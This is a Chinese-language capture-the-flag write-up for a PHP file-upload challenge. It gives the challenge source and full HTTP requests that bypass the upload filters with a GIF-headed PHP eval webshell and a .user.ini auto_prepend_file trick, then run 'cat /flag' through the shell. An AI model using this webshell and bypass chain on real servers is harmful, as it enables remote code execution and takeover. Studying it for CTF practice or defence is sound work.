题目给出了源码,如下。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Upload Labs</title>
</head>
<body>
<h2>Upload Labs</h2>
<form action="index.php" method="post" enctype="multipart/form-data">
<label for="file">文件名:</label>
<input type="file" name="fileUpload" id="file"><br>
<input type="submit" name="upload" value="提交">
</form>
</body>
</html>
<?php
// error_reporting(0);
$userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]);
if (!file_exists($userdir)) {
mkdir($userdir, 0777, true);
}
file_put_contents($userdir . "/index.php", "");
if (isset($_POST["upload"])) {
$tmp_name = $_FILES["fileUpload"]["tmp_name"];
$name = $_FILES["fileUpload"]["name"];
if (!$tmp_name) {
die("filesize too big!");
}
if (!$name) {
die("filename cannot be empty!");
}
$extension = substr($name, strrpos($name, ".") + 1);
if (preg_match("/ph|htacess/i", $extension)) {
die("illegal suffix!");
}
if (mb_strpos(file_get_contents($tmp_name), "<?") !== FALSE) {
die("<? in contents!");
}
$image_type = exif_imagetype($tmp_name);
if (!$image_type) {
die("exif_imagetype:not image!");
}
$upload_file_path = $userdir . "/" . $name;
move_uploaded_file($tmp_name, $upload_file_path);
echo "Your dir " . $userdir. ' <br>';
echo 'Your files : <br>';
var_dump(scandir($userdir));
}
可以看到,题目不允许上传后缀名中有 ph、htaccess 的文件,同时也不允许上传文件内容中存在 <? 的文件,最后还要求文件通过 exif_imagetype 检测。
因此,可以利用 .user.ini 机制上传。
利用
.user.ini的前提是服务器开启了CGI或者FastCGI,并且上传文件的存储路径下有index.php等可执行文件。
.user.ini中两个中的配置就是auto_prepend_file和auto_append_file。这两个配置的意思就是:我们指定一个文件(如1.jpg),那么该文件就会被包含在要执行的PHP文件中(如index.php),相当于在index.php中插入一句:require(./1.jpg)。这两个设置的区别只是在于auto_prepend_file是在文件前插入,auto_append_file在文件最后插入。
通过分析源码及观察上传文件后的响应包,可以发现,在用户上传的文件的位置存在一个 index.php 文件,因此可以使用 .user.ini。
HTTP/1.1 200 OK
Server: openresty
Date: Thu, 02 Nov 2023 13:22:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 736
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Upload Labs</title>
</head>
<body>
<h2>Upload Labs</h2>
<form action="index.php" method="post" enctype="multipart/form-data">
<label for="file">文件名:</label>
<input type="file" name="fileUpload" id="file"><br>
<input type="submit" name="upload" value="提交">
</form>
</body>
</html>
Your dir uploads/c55e0cb61f7eb238df09ae30a206e5ee <br>Your files : <br>array(4) {
[0]=>
string(1) "."
[1]=>
string(2) ".."
[2]=>
string(5) "1.jpg"
[3]=>
string(9) "index.php"
}
因此,首先上传一个图片马,如下。
POST /index.php HTTP/1.1
Host: 56fde574-d255-4e6a-a7e2-dc3c0d1c5a15.node4.buuoj.cn:81
Content-Length: 342
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://56fde574-d255-4e6a-a7e2-dc3c0d1c5a15.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6i2QHAOKIWDf1uox
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://56fde574-d255-4e6a-a7e2-dc3c0d1c5a15.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundary6i2QHAOKIWDf1uox
Content-Disposition: form-data; name="fileUpload"; filename="1.jpg"
Content-Type: image/jpeg
GIF9
<script language="php">@eval($_POST['cmd'])</script>
------WebKitFormBoundary6i2QHAOKIWDf1uox
Content-Disposition: form-data; name="upload"
提交
------WebKitFormBoundary6i2QHAOKIWDf1uox--
随后,上传一个 .user.ini 文件,让该目录下的所有 PHP 文件都包含 1.jpg 文件(即刚刚上传的图片马)。
POST /index.php HTTP/1.1
Host: 56fde574-d255-4e6a-a7e2-dc3c0d1c5a15.node4.buuoj.cn:81
Content-Length: 319
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://56fde574-d255-4e6a-a7e2-dc3c0d1c5a15.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6i2QHAOKIWDf1uox
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://56fde574-d255-4e6a-a7e2-dc3c0d1c5a15.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundary6i2QHAOKIWDf1uox
Content-Disposition: form-data; name="fileUpload"; filename=".user.ini"
Content-Type: image/jpeg
GIF9
auto_prepend_file = 1.jpg
------WebKitFormBoundary6i2QHAOKIWDf1uox
Content-Disposition: form-data; name="upload"
提交
------WebKitFormBoundary6i2QHAOKIWDf1uox--
在这里,不知为何,用蚁剑或菜刀都无法连接上 shell,因此,直接访问 shell 去执行系统命令拿到 flag 即可。
POST /uploads/c55e0cb61f7eb238df09ae30a206e5ee/index.php HTTP/1.1
Host: 56fde574-d255-4e6a-a7e2-dc3c0d1c5a15.node4.buuoj.cn
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
cmd=system("cat /flag");